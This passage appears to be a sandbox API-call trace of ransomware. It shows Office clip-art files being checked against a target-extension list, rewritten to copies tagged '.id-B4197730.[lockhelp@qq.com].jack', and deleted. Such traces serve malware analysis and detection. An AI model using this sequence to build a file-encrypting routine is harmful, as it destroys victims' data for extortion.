(lpString=".doc") returned 4 [0211.116] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0211.116] lstrlenW (lpString=".docx") returned 5 [0211.116] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0211.116] lstrlenW (lpString=".pdf") returned 4 [0211.116] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0211.116] lstrlenW (lpString=".xls") returned 4 [0211.116] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0211.116] lstrlenW (lpString=".xlsx") returned 5 [0211.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0211.116] lstrlenW (lpString=".ppt") returned 4 [0211.116] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0211.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.116] lstrlenW (lpString=".zip") returned 4 [0211.116] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0211.116] lstrlenW (lpString=".rar") returned 4 [0211.116] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0211.116] lstrlenW (lpString=".bz2") returned 4 [0211.116] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0211.116] lstrlenW (lpString=".7z") returned 3 [0211.116] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0211.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.116] lstrlenW (lpString=".dbf") returned 4 [0211.116] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0211.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.116] lstrlenW (lpString=".1cd") returned 4 [0211.116] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0211.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0211.116] lstrlenW (lpString=".jpg") returned 4 [0211.116] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0211.117] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0211.117] lstrlenW (lpString="AG00163_.GIF") returned 12 [0211.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0211.117] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=6984) returned 1 [0211.117] CloseHandle (hObject=0x3d4) returned 1 [0211.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 0x220 [0211.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0211.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0211.117] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0211.117] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0211.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0211.118] GetLastError () returned 0x0 [0211.118] ReadFile (in: hFile=0x3d4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x1b48, lpOverlapped=0x0) returned 1 [0215.085] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x1b50, lpOverlapped=0x0) returned 1 [0215.086] ReadFile (in: hFile=0x3d4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.086] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0215.086] SetEndOfFile (hFile=0x43c) returned 1 [0215.094] CloseHandle (hObject=0x43c) returned 1 [0215.094] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.094] SetEndOfFile (hFile=0x3d4) returned 1 [0215.095] CloseHandle (hObject=0x3d4) returned 1 [0215.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.096] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0215.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.115] lstrlenW (lpString=".doc") returned 4 [0215.115] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.115] lstrlenW (lpString=".docx") returned 5 [0215.115] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.115] lstrlenW (lpString=".pdf") returned 4 [0215.115] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.115] lstrlenW (lpString=".xls") returned 4 [0215.115] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.115] lstrlenW (lpString=".xlsx") returned 5 [0215.115] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.115] lstrlenW (lpString=".ppt") returned 4 [0215.115] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.115] lstrlenW (lpString=".zip") returned 4 [0215.115] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.115] lstrlenW (lpString=".rar") returned 4 [0215.115] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.115] lstrlenW (lpString=".bz2") returned 4 [0215.115] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.115] lstrlenW (lpString=".7z") returned 3 [0215.115] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.115] lstrlenW (lpString=".dbf") returned 4 [0215.115] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.115] lstrlenW (lpString=".1cd") returned 4 [0215.116] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString=".jpg") returned 4 [0215.116] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString=".doc") returned 4 [0215.116] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.116] lstrlenW (lpString=".docx") returned 5 [0215.116] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.116] lstrlenW (lpString=".pdf") returned 4 [0215.116] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.116] lstrlenW (lpString=".xls") returned 4 [0215.116] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.116] lstrlenW (lpString=".xlsx") returned 5 [0215.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.116] lstrlenW (lpString=".ppt") returned 4 [0215.116] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString=".zip") returned 4 [0215.116] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.116] lstrlenW (lpString=".rar") returned 4 [0215.116] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.116] lstrlenW (lpString=".bz2") returned 4 [0215.116] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.116] lstrlenW (lpString=".7z") returned 3 [0215.116] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString=".dbf") returned 4 [0215.116] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString=".1cd") returned 4 [0215.116] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0215.116] lstrlenW (lpString=".jpg") returned 4 [0215.117] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.117] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0215.117] lstrlenW (lpString="AG00169_.GIF") returned 12 [0215.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0215.124] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=5375) returned 1 [0215.124] CloseHandle (hObject=0x3ac) returned 1 [0215.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 0x220 [0215.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0215.124] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.125] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0215.125] GetLastError () returned 0x0 [0215.125] ReadFile (in: hFile=0x3ac, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x14ff, lpOverlapped=0x0) returned 1 [0215.240] WriteFile (in: hFile=0x3d8, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x1500, lpOverlapped=0x0) returned 1 [0215.242] ReadFile (in: hFile=0x3ac, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.242] WriteFile (in: hFile=0x3d8, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0215.242] SetEndOfFile (hFile=0x3d8) returned 1 [0215.242] CloseHandle (hObject=0x3d8) returned 1 [0215.243] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.243] SetEndOfFile (hFile=0x3ac) returned 1 [0215.244] CloseHandle (hObject=0x3ac) returned 1 [0215.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0215.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.245] lstrlenW (lpString=".doc") returned 4 [0215.245] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.245] lstrlenW (lpString=".docx") returned 5 [0215.245] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.245] lstrlenW (lpString=".pdf") returned 4 [0215.245] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.245] lstrlenW (lpString=".xls") returned 4 [0215.245] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.245] lstrlenW (lpString=".xlsx") returned 5 [0215.245] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.245] lstrlenW (lpString=".ppt") returned 4 [0215.245] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.245] lstrlenW (lpString=".zip") returned 4 [0215.245] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.245] lstrlenW (lpString=".rar") returned 4 [0215.246] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.246] lstrlenW (lpString=".bz2") returned 4 [0215.246] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.246] lstrlenW (lpString=".7z") returned 3 [0215.246] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.246] lstrlenW (lpString=".dbf") returned 4 [0215.246] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.246] lstrlenW (lpString=".1cd") returned 4 [0215.246] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.246] lstrlenW (lpString=".jpg") returned 4 [0215.246] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.246] lstrlenW (lpString=".doc") returned 4 [0215.246] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.246] lstrlenW (lpString=".docx") returned 5 [0215.246] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.246] lstrlenW (lpString=".pdf") returned 4 [0215.246] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.246] lstrlenW (lpString=".xls") returned 4 [0215.246] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.246] lstrlenW (lpString=".xlsx") returned 5 [0215.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.246] lstrlenW (lpString=".ppt") returned 4 [0215.246] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.247] lstrlenW (lpString=".zip") returned 4 [0215.247] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.247] lstrlenW (lpString=".rar") returned 4 [0215.247] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.247] lstrlenW (lpString=".bz2") returned 4 [0215.247] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.247] lstrlenW (lpString=".7z") returned 3 [0215.247] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.247] lstrlenW (lpString=".dbf") returned 4 [0215.247] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.247] lstrlenW (lpString=".1cd") returned 4 [0215.247] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0215.247] lstrlenW (lpString=".jpg") returned 4 [0215.247] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.247] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0215.247] lstrlenW (lpString="AG00174_.GIF") returned 12 [0215.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0215.248] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=3966) returned 1 [0215.248] CloseHandle (hObject=0x3ac) returned 1 [0215.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif")) returned 0x220 [0215.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0215.249] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.249] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0215.357] GetLastError () returned 0x0 [0215.357] ReadFile (in: hFile=0x3ac, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xf7e, lpOverlapped=0x0) returned 1 [0218.073] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf80, lpOverlapped=0x0) returned 1 [0219.528] ReadFile (in: hFile=0x3ac, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.528] WriteFile (in: hFile=0x43c, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0219.528] SetEndOfFile (hFile=0x43c) returned 1 [0219.538] CloseHandle (hObject=0x43c) returned 1 [0219.539] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.539] SetEndOfFile (hFile=0x3ac) returned 1 [0219.540] CloseHandle (hObject=0x3ac) returned 1 [0219.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0219.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.541] lstrlenW (lpString=".doc") returned 4 [0219.541] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.541] lstrlenW (lpString=".docx") returned 5 [0219.541] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.541] lstrlenW (lpString=".pdf") returned 4 [0219.541] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.541] lstrlenW (lpString=".xls") returned 4 [0219.541] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.541] lstrlenW (lpString=".xlsx") returned 5 [0219.541] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.541] lstrlenW (lpString=".ppt") returned 4 [0219.541] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.541] lstrlenW (lpString=".zip") returned 4 [0219.541] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.542] lstrlenW (lpString=".rar") returned 4 [0219.542] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.542] lstrlenW (lpString=".bz2") returned 4 [0219.542] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.542] lstrlenW (lpString=".7z") returned 3 [0219.542] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.542] lstrlenW (lpString=".dbf") returned 4 [0219.542] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.542] lstrlenW (lpString=".1cd") returned 4 [0219.542] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.542] lstrlenW (lpString=".jpg") returned 4 [0219.542] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.542] lstrlenW (lpString=".doc") returned 4 [0219.542] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.542] lstrlenW (lpString=".docx") returned 5 [0219.542] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.542] lstrlenW (lpString=".pdf") returned 4 [0219.542] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.542] lstrlenW (lpString=".xls") returned 4 [0219.542] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.542] lstrlenW (lpString=".xlsx") returned 5 [0219.542] 